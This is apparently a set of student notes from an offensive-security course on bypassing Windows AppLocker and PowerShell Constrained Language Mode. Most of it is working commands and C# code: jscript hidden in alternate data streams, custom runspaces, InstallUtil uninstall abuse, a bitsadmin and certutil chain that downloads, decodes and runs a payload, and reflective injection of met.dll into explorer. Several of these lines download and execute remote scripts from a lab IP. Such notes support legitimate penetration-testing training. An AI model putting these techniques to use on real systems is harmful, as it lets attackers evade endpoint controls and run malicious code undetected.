Method 1 (Trusted Folders)
- Copy the program in an folder where every user can write and execute.
Check for read and writable folders
accesschk.exe "student" C:\Windows -wus
Check for executable folder from the list of folder obtained from the above output
icacls.exe c:\Windows\Tasks
Method 2 (Unmanaged DLLs)
- Bypass with unmanaged Dlls
rundll32 $Path.dll,run
Method 3 (Alternate Data Streams)
-
Alternate Data Streams
-
Create a jscript file test.js
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("cmd.exe");
- Transfer the file in teamviewer log file and create alternate data stream
type test.js "C:\Program Files (x86)\TeamViewer\TeamViewer12.log:test.js"
- If execute it by double click the main stream will be opened
- But if execute it with wscript in command prompt we can execute the jscript
wscript "C:\Program Files (x86)\TeamViewer\TeamViewer12.log:test.js"
Method 4 (Third Party Execution)
- Use Perl or Python if installed
Method 5 (Bypassing with Powershell CLM)
- Powershell Constrained Language Mode
There are three levels
-
Full Language
-
No Language
-
Restricted Language
-
Constrained Language mode is enabled mode when we use Applocker
It restricts .Net,exe,refelctive execution.
The current context is stored at $ExecutionContext.SessionState.LanguageMode.
$ExecutionContext.SessionState.LanguageMode check it like this.
Method 5.1 (Custom Runspaces)
- Powershell Uses System.Mangement.Automaiton.dll to create Runspace.
We can use Public Apis to create custom runspaces and bypass CLM using .NET.
Check the Video 6.3 Bypassing Applocker with Powershell for how to create it for adding references.
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
namespace Bypass
{
class Program
{
static void Main(string[] args)
{
Runspace rs = RunspaceFactory.CreateRunspace();
rs.Open();
PowerShell ps = PowerShell.Create();
ps.Runspace = rs;
String cmd = "(New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/PowerUp.ps1') | IEX; Invoke-AllChecks | Out-File -FilePath C:\\Tools\\test.txt";
ps.AddScript(cmd);
ps.Invoke();
rs.Close();
}
}
}
- Compile the above program in release mode
- Copy to directory where we can execute
- and check the output file for possible privilege escalations.
Method 5.2 (InstalUtil)
We don’t need to bypass Applocker here
we use uinstall method because we need admin for install
References : system.configuration.install
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Configuration.Install;
namespace Bypass
{
class Program
{
static void Main(string[] args)
{
Console.WriteLine("This is the main method which is a decoy");
}
}
[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
public override void Uninstall(System.Collections.IDictionary savedState)
{
String cmd = "$ExecutionContext.SessionState.LanguageMode | Out-File -FilePath C:\\Tools\\test.txt";
Runspace rs = RunspaceFactory.CreateRunspace();
rs.Open();
PowerShell ps = PowerShell.Create();
ps.Runspace = rs;
ps.AddScript(cmd);
ps.Invoke();
rs.Close();
}
}
}
- Compile it and execute it like this
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Tools\Bypass.exe
Other way to bypass AV to download (LOL)
certutil -encode C:\Users\Offsec\source\repos\Bypass\Bypass\bin\x64\Release\Bypass.exe file.txt
type file.txt
Download it with
bitsadmin /Transfer myJob http://192.168.119.120/file.txt C:\Users\student\enc.txt
certutil -decode enc.txt Bypass.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\users\student\Bypass.exe
- Combining
bitsadmin /Transfer myJob http://192.168.119.120/file.txt C:\users\student\enc.txt && certutil -decode C:\users\student\enc.txt C:\users\student\Bypass.exe && del C:\users\student\enc.txt && C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\users\student\Bypass.exe
Method 5.3 (Reflective Injection Returs)
String cmd = "$bytes = (New-Object System.Net.WebClient).DownloadData('http://192.168.119.120/met.dll');(New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/Invoke-ReflectivePEInjection.ps1') | IEX; $procid = (Get-Process -Name explorer).Id; Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid";
Method 6 (Bypassing Applocker with C#)
System.Workflow.CompomentModel.dll
- Use dnSpy as administrator. and load the dll.
- We need to focus on System.Workflow.ComponentModel.compiler
- We will focus on WorkflowCompiler which has compile Method